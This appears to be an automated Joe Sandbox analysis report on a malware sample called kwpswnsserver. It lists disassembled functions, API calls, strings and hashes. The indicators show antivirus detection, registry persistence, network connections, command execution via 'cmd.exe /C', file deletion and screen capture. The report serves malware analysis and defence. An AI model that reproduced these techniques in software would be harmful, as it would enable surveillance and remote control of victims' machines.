                                                                  control_flow_graph 863 427ad10-427ad2b 864 427ad84-427ad8f 863->864 865 427ad2d-427ad5b RegOpenKeyExW 863->865 868 427b845-427b84b call 427ce00 864->868 869 427ad95-427ad9c 864->869 866 427ad5d-427ad73 RegQueryValueExW 865->866 867 427ad79-427ad7e 865->867 866->867 867->864 873 427b84e-427b854 867->873 868->873 870 427afe3-427b09b call 427f707 call 4286770 call 427eff4 call 4287660 call 427f707 call 427cf20 call 427eff4 869->870 871 427adea-427adf1 869->871 921 427b162-427b189 call 427fa29 CloseHandle 870->921 922 427b0a1-427b0ee call 4287660 RegCreateKeyW 870->922 871->873 874 427adf7-427ae29 call 427f707 call 4286770 871->874 885 427ae42-427ae4e 874->885 886 427ae2b-427ae3f wsprintfW 874->886 889 427ae50 885->889 890 427ae9a-427aef1 call 427eff4 call 4287660 call 4272ba0 call 427efff * 2 885->890 886->885 893 427ae54-427ae5f 889->893 896 427ae60-427ae66 893->896 899 427ae86-427ae88 896->899 900 427ae68-427ae6b 896->900 901 427ae8b-427ae8d 899->901 904 427ae82-427ae84 900->904 905 427ae6d-427ae75 900->905 906 427aef4-427af09 901->906 907 427ae8f-427ae98 901->907 904->901 905->899 910 427ae77-427ae80 905->910 913 427af10-427af16 906->913 907->890 907->893 910->896 910->904 916 427af36-427af38 913->916 917 427af18-427af1b 913->917 920 427af3b-427af3d 916->920 918 427af32-427af34 917->918 919 427af1d-427af25 917->919 918->920 919->916 924 427af27-427af30 919->924 925 427af3f-427af41 920->925 926 427afae-427afe0 call 427fa29 CloseHandle call 427efff 920->926 938 427b0f0-427b13f call 427eff4 call 4275a30 RegDeleteValueW RegSetValueExW 922->938 939 427b14a-427b15f RegCloseKey call 427fac9 922->939 924->913 924->918 931 427af55-427af5c 925->931 932 427af43-427af4e call 427efff 925->932 940 427af70-427af74 931->940 941 427af5e-427af69 call 427fac9 931->941 932->931 938->939 959 427b141-427b147 call 427fac9 938->959 939->921 947 427af76-427af7f call 427efff 940->947 948 427af85-427afa9 call 427f020 940->948 941->940 947->948 948->890 959->939
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0427AD53
                                                                  • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0427AD73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: OpenQueryValue
                                                                  • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                  • API String ID: 4153817207-1338088003
                                                                  • Opcode ID: 767c3af064364780efb90f9b79d82b6984eaabf9398dab9a38cf9f5c0d384725
                                                                  • Instruction ID: 6c83f0a46ae544b974668804acb694343be5b13989cebb74bc26636ced55d55c
                                                                  • Opcode Fuzzy Hash: 767c3af064364780efb90f9b79d82b6984eaabf9398dab9a38cf9f5c0d384725
                                                                  • Instruction Fuzzy Hash: 1DC1D2B1B10201ABE710EF24DC45F6B73A8EF94718F140568F9499B281E7B5F914CBA2
                                                                  Function 04276150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222stringcomregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 962 4276150-42761a5 call 4286770 call 428004b 967 42761a7-42761ae 962->967 968 4276201-4276228 CoCreateInstance 962->968 969 42761b0-42761b2 call 4276050 967->969 970 4276422-427642f lstrlenW 968->970 971 427622e-4276282 968->971 977 42761b7-42761b9 969->977 973 4276441-4276450 970->973 974 4276431-427643b lstrcatW 970->974 982 427640a-4276418 971->982 983 4276288-42762a2 971->983 975 4276452-4276457 973->975 976 427645a-427647a call 427f00a 973->976 974->973 975->976 980 42761db-42761ff call 428004b 977->980 981 42761bb-42761d9 lstrcatW * 2 977->981 980->968 980->969 981->980 982->970 986 427641a-427641f 982->986 983->982 989 42762a8-42762b4 983->989 986->970 990 42762c0-4276363 call 4286770 wsprintfW RegOpenKeyExW 989->990 993 42763e9-42763ff 990->993 994 4276369-42763ba call 4286770 RegQueryValueExW 990->994 997 4276402-4276404 993->997 998 42763dc-42763e3 RegCloseKey 994->998 999 42763bc-42763da lstrcatW * 2 994->999 997->982 997->990 998->993 999->998
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0427618B
                                                                  • lstrcatW.KERNEL32(042A1F10,0429510C,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 042761CD
                                                                  • lstrcatW.KERNEL32(042A1F10,0429535C,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 042761D9
                                                                  • CoCreateInstance.OLE32(04292480,00000000,00000017,0429578C,?,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 04276220
                                                                  • _memset.LIBCMT ref: 042762CE
                                                                  • wsprintfW.USER32 ref: 04276336
                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0427635F
                                                                  • _memset.LIBCMT ref: 04276376
                                                                    • Part of subcall function 04276050: _memset.LIBCMT ref: 0427607C
                                                                    • Part of subcall function 04276050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04276088
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                  • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                  • API String ID: 1221949200-1583895642
                                                                  • Opcode ID: d30e6f33934134326311c794a3ffe5ae3e1429b6b5a6f460e9e4a1d1b80459d8
                                                                  • Instruction ID: ca122e894d8e76646722f8b8a1c75d99a2b33bbdd58ef015f5100cd026916b16
                                                                  • Opcode Fuzzy Hash: d30e6f33934134326311c794a3ffe5ae3e1429b6b5a6f460e9e4a1d1b80459d8
                                                                  • Instruction Fuzzy Hash: 708194B1B50228ABDB20DB54CC44FAEB7B8EB48714F0445C8F709A7141D674AE85CFA4
                                                                  Function 6C8780B0 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 328networkmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Cleanup$closesocket$AllocStartupVirtualconnectfreeaddrinfogetaddrinforecvsocket
                                                                  • String ID: $@
                                                                  • API String ID: 1138076629-1077428164
                                                                  • Opcode ID: 761546856006ac92e495809081b184eb77bfbe2a8da205b858165cfd52332ac5
                                                                  • Instruction ID: 6fae05632bdb5788f681e663a0936a08e495d84d52abf287e74db719567fead7
                                                                  • Opcode Fuzzy Hash: 761546856006ac92e495809081b184eb77bfbe2a8da205b858165cfd52332ac5
                                                                  • Instruction Fuzzy Hash: 03F1D9B4A14259CFCB64DF68C98879DBBF0AB0A304F4085AAD84DE7750E7349E85CF52
                                                                  Function 04275F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1061 4275f40-4275f7b CreateMutexW GetLastError 1062 4275f7d 1061->1062 1063 4275f9b-4275fa2 1061->1063 1064 4275f80-4275f99 Sleep CreateMutexW GetLastError 1062->1064 1065 4275fa4-4275faa 1063->1065 1066 4276003-427602d GetModuleHandleW GetConsoleWindow call 427e4f0 1063->1066 1064->1063 1064->1064 1068 4275fb0-4275fe1 call 4286770 lstrlenW call 4276d70 1065->1068 1072 427602f-4276045 call 427f00a 1066->1072 1073 4276048-427604f call 427e850 1066->1073 1080 4275ff3-4276001 Sleep 1068->1080 1081 4275fe3-4275ff1 lstrcmpW 1068->1081 1080->1066 1080->1068 1081->1066 1081->1080
                                                                  APIs
                                                                  • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 04275F66
                                                                  • GetLastError.KERNEL32 ref: 04275F6E
                                                                  • Sleep.KERNEL32(000003E8), ref: 04275F85
                                                                  • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 04275F90
                                                                  • GetLastError.KERNEL32 ref: 04275F92
                                                                  • _memset.LIBCMT ref: 04275FB9
                                                                  • lstrlenW.KERNEL32(?), ref: 04275FC6
                                                                  • lstrcmpW.KERNEL32(?,04295328), ref: 04275FED
                                                                  • Sleep.KERNEL32(000003E8), ref: 04275FF8
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 04276005
                                                                  • GetConsoleWindow.KERNEL32 ref: 0427600F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                  • String ID: 2024.12. 3$key$open
                                                                  • API String ID: 2922109467-4129338558
                                                                  • Opcode ID: 2b76f90e87e754fda1a64f6f6dbab00ba01e9d2bcca1d914076e6d1fbd5c47a3
                                                                  • Instruction ID: f76efaddaad56bd6764240642cb728c72e8f4340be85d8501dd66da81fd0cd5d
                                                                  • Opcode Fuzzy Hash: 2b76f90e87e754fda1a64f6f6dbab00ba01e9d2bcca1d914076e6d1fbd5c47a3
                                                                  • Instruction Fuzzy Hash: E421B672B54306BBE714DB64EC49B5AB394EB94714F100819E604971C1DEB4BD49CBB3
                                                                  Function 042762B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1082 42762b6-42762bd 1083 42762c0-4276363 call 4286770 wsprintfW RegOpenKeyExW 1082->1083 1086 42763e9-42763ff 1083->1086 1087 4276369-4276376 call 4286770 1083->1087 1090 4276402-4276404 1086->1090 1089 427637b-42763ba RegQueryValueExW 1087->1089 1091 42763dc-42763e3 RegCloseKey 1089->1091 1092 42763bc-42763da lstrcatW * 2 1089->1092 1090->1083 1093 427640a-4276418 1090->1093 1091->1086 1092->1091 1094 4276422-427642f lstrlenW 1093->1094 1095 427641a-427641f 1093->1095 1096 4276441-4276450 1094->1096 1097 4276431-427643b lstrcatW 1094->1097 1095->1094 1098 4276452-4276457 1096->1098 1099 427645a-427647a call 427f00a 1096->1099 1097->1096 1098->1099
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 042762CE
                                                                  • wsprintfW.USER32 ref: 04276336
                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0427635F
                                                                  • _memset.LIBCMT ref: 04276376
                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 042763B2
                                                                  • lstrcatW.KERNEL32(042A1F10,?), ref: 042763CE
                                                                  • lstrcatW.KERNEL32(042A1F10,0429535C), ref: 042763DA
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 042763E3
                                                                  • lstrlenW.KERNEL32(042A1F10,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 04276427
                                                                  • lstrcatW.KERNEL32(042A1F10,042953D4,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 0427643B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                  • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                  • API String ID: 1671694837-1583895642
                                                                  • Opcode ID: c8e57cfa0f1aee302b6936a443c711b00d07b4e01a77f18b0ac71747bdaeecaf
                                                                  • Instruction ID: a81993d17064e6151b4cfef7649942224cec503b6dee4bb5a49f89f8c4dc0746
                                                                  • Opcode Fuzzy Hash: c8e57cfa0f1aee302b6936a443c711b00d07b4e01a77f18b0ac71747bdaeecaf
                                                                  • Instruction Fuzzy Hash: 214190B1B50268ABDB24DB94CC54FAEB7B8AB48704F0041C8F309A7181DA74AE84CF64
                                                                  Function 04277490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1102 4277490-42774a6 LoadLibraryW 1103 427759e-42775a2 1102->1103 1104 42774ac-42774ba GetProcAddress 1102->1104 1105 4277597-4277598 FreeLibrary 1104->1105 1106 42774c0-4277525 call 427f858 call 427eff4 call 4277410 1104->1106 1105->1103 1114 4277527-4277530 1106->1114 1115 4277532-4277536 1106->1115 1116 427753b-427756b RegOpenKeyExW RegQueryValueExW 1114->1116 1115->1116 1117 4277582-427758d RegCloseKey call 427fac9 1116->1117 1118 427756d-427756f 1116->1118 1121 4277592-4277596 1117->1121 1118->1117 1120 4277571-427757f call 427fc0e 1118->1120 1120->1117 1121->1105
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,04275611,0000035E,000002FA), ref: 0427749C
                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 042774B2
                                                                  • swprintf.LIBCMT ref: 042774EF
                                                                    • Part of subcall function 04277410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04277523), ref: 0427743D
                                                                    • Part of subcall function 04277410: GetProcAddress.KERNEL32(00000000), ref: 04277444
                                                                    • Part of subcall function 04277410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04277523), ref: 04277452
                                                                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 04277547
                                                                  • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 04277563
                                                                  • RegCloseKey.KERNEL32(000002FA), ref: 04277586
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,04275611,0000035E,000002FA), ref: 04277598
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                  • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                  • API String ID: 2158625971-3190923360
                                                                  • Opcode ID: 2e15cc60ba080d24395dca92e03c87130d85ea3ca8a9c3ad795fa6634c7c57fb
                                                                  • Instruction ID: 86fad895b0a97e8a30f8dc7cd81958a0529f1e3ee2798918ac0dfc6b6986ce98
                                                                  • Opcode Fuzzy Hash: 2e15cc60ba080d24395dca92e03c87130d85ea3ca8a9c3ad795fa6634c7c57fb
                                                                  • Instruction Fuzzy Hash: D731B672B50209BBEB14DBA8DD45EBF7BBCDF48740F140559BA05A6141EA74FE04CBA0
                                                                  Function 6C872110 Relevance: 20.2, APIs: 5, Strings: 6, Instructions: 927sleepprocessCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8720A0: GetModuleFileNameA.KERNEL32 ref: 6C8720D3
                                                                    • Part of subcall function 6C871F60: SHGetFolderPathA.SHELL32 ref: 6C871FBB
                                                                  • Sleep.KERNEL32 ref: 6C872638
                                                                  • Sleep.KERNEL32 ref: 6C872C72
                                                                  • WinExec.KERNEL32 ref: 6C872E84
                                                                  • WinExec.KERNEL32 ref: 6C8730DB
                                                                  • Sleep.KERNEL32 ref: 6C8730EB
                                                                    • Part of subcall function 6C872040: DeleteFileA.KERNEL32(?,?,?,?,6C873107), ref: 6C872055
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExecFile$DeleteFolderModuleNamePath
                                                                  • String ID: #$L$M$X$cmd.exe /C $cmd.exe /C
                                                                  • API String ID: 2783004147-3173768389
                                                                  • Opcode ID: 0aa89c9a7fa0179653c5eb9a49a565188820d5ff941c7d16073859f97d99c232
                                                                  • Instruction ID: 0051ba51fe67837ab7ea09e10bf430a041e38bb4e44a04d5c28164f9a2d0d41b
                                                                  • Opcode Fuzzy Hash: 0aa89c9a7fa0179653c5eb9a49a565188820d5ff941c7d16073859f97d99c232
                                                                  • Instruction Fuzzy Hash: EBA23A71D00258CADB35DF28DE586DCBBB0AB15304F0086EAC45967B91EB745B8CCFA2
                                                                  Function 0427C060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000002,?,5EF26BF0,?,00000000,?), ref: 0427C09E
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0427C0AA
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0427C0BF
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0427C0D5
                                                                  • EnterCriticalSection.KERNEL32(0429FB64), ref: 0427C113
                                                                  • LeaveCriticalSection.KERNEL32(0429FB64), ref: 0427C124
                                                                    • Part of subcall function 04279DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04279E04
                                                                    • Part of subcall function 04279DE0: GdipDisposeImage.GDIPLUS(?), ref: 04279E18
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0427C14C
                                                                    • Part of subcall function 0427A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0427A48D
                                                                    • Part of subcall function 0427A460: _free.LIBCMT ref: 0427A503
                                                                  • GetHGlobalFromStream.OLE32(?,?), ref: 0427C16D
                                                                  • GlobalLock.KERNEL32(?), ref: 0427C177
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0427C18F
                                                                    • Part of subcall function 04279BA0: DeleteObject.GDI32(?), ref: 04279BD2
                                                                    • Part of subcall function 04279BA0: EnterCriticalSection.KERNEL32(0429FB64,?,?,?,04279B7B), ref: 04279BE3
                                                                    • Part of subcall function 04279BA0: EnterCriticalSection.KERNEL32(0429FB64,?,?,?,04279B7B), ref: 04279BF8
                                                                    • Part of subcall function 04279BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,04279B7B), ref: 04279C04
                                                                    • Part of subcall function 04279BA0: LeaveCriticalSection.KERNEL32(0429FB64,?,?,?,04279B7B), ref: 04279C15
                                                                    • Part of subcall function 04279BA0: LeaveCriticalSection.KERNEL32(0429FB64,?,?,?,04279B7B), ref: 04279C1C
                                                                  • GlobalSize.KERNEL32(00000000), ref: 0427C1A5
                                                                  • GlobalUnlock.KERNEL32(?), ref: 0427C221
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0427C249
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                  • String ID:
                                                                  • API String ID: 1483550337-0
                                                                  • Opcode ID: 5ffa1b7d140446bb1695d78d618e2b87dcccfa2e0fb26acc56f5e3bf59931f62
                                                                  • Instruction ID: bcf4931a31b6a4ab7e12878764c48eefe9fde8c04f94ea689d15560584283a57
                                                                  • Opcode Fuzzy Hash: 5ffa1b7d140446bb1695d78d618e2b87dcccfa2e0fb26acc56f5e3bf59931f62
                                                                  • Instruction Fuzzy Hash: 7A6169B1E10218EFDB14EFE9E88899EBBB8FF49310F104529E515A7201DB34AD05CFA0
                                                                  Function 04276490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 042764C2
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 042764E2
                                                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 04276524
                                                                  • _memset.LIBCMT ref: 04276560
                                                                  • _memset.LIBCMT ref: 0427658E
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 042765BA
                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 042765C3
                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 042765D5
                                                                  • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 04276625
                                                                  • lstrlenW.KERNEL32(?), ref: 04276635
                                                                  Strings
                                                                  • Software\Tencent\Plugin\VAS, xrefs: 042764D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                  • String ID: Software\Tencent\Plugin\VAS
                                                                  • API String ID: 2921034913-3343197220
                                                                  • Opcode ID: 122895ba454c147c97f665aae1a7e0a56bab5a126f5a1d3892a6075443bcaa42
                                                                  • Instruction ID: 1044b5b1c0501305e3ad5321ca085c36d0d12dc4c63a511a495b31d9c75c0a00
                                                                  • Opcode Fuzzy Hash: 122895ba454c147c97f665aae1a7e0a56bab5a126f5a1d3892a6075443bcaa42
                                                                  • Instruction Fuzzy Hash: B341C5F1B10219BBDB24DB54DD85FEA7378DB44700F4045D9E309B7081EA74AE858FA4
                                                                  Function 04276790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 04275320: InterlockedDecrement.KERNEL32(00000008), ref: 0427536F
                                                                    • Part of subcall function 04275320: SysFreeString.OLEAUT32(00000000), ref: 04275384
                                                                    • Part of subcall function 04275320: SysAllocString.OLEAUT32(04295148), ref: 042753D5
                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,04295148,042769A4,04295148,00000000,75BF73E0), ref: 042767F4
                                                                  • GetLastError.KERNEL32 ref: 042767FE
                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04276816
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0427681D
                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0427683F
                                                                  • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 04276871
                                                                  • GetLastError.KERNEL32 ref: 0427687B
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 042768E6
                                                                  • HeapFree.KERNEL32(00000000), ref: 042768ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                  • String ID: NONE_MAPPED
                                                                  • API String ID: 1317816589-2950899194
                                                                  • Opcode ID: be359d957736d13ce169231d5f69cf47054ccb4d66b509241e44d4a1bf06b118
                                                                  • Instruction ID: 52702b6528051ef0e8cd1aae6cf2235065080234e52b1e1e7bd7e3982588a49f
                                                                  • Opcode Fuzzy Hash: be359d957736d13ce169231d5f69cf47054ccb4d66b509241e44d4a1bf06b118
                                                                  • Instruction Fuzzy Hash: BA4182B1B10219BFDB249F64DD48FEAB378EB85700F404599E609A7140DE786E898F74
                                                                  Function 0427A460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0427A48D
                                                                  • _malloc.LIBCMT ref: 0427A4D1
                                                                  • _free.LIBCMT ref: 0427A503
                                                                  • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0427A522
                                                                  • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0427A594
                                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 0427A59F
                                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0427A5C5
                                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 0427A5DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                  • String ID: &
                                                                  • API String ID: 2794124522-3042966939
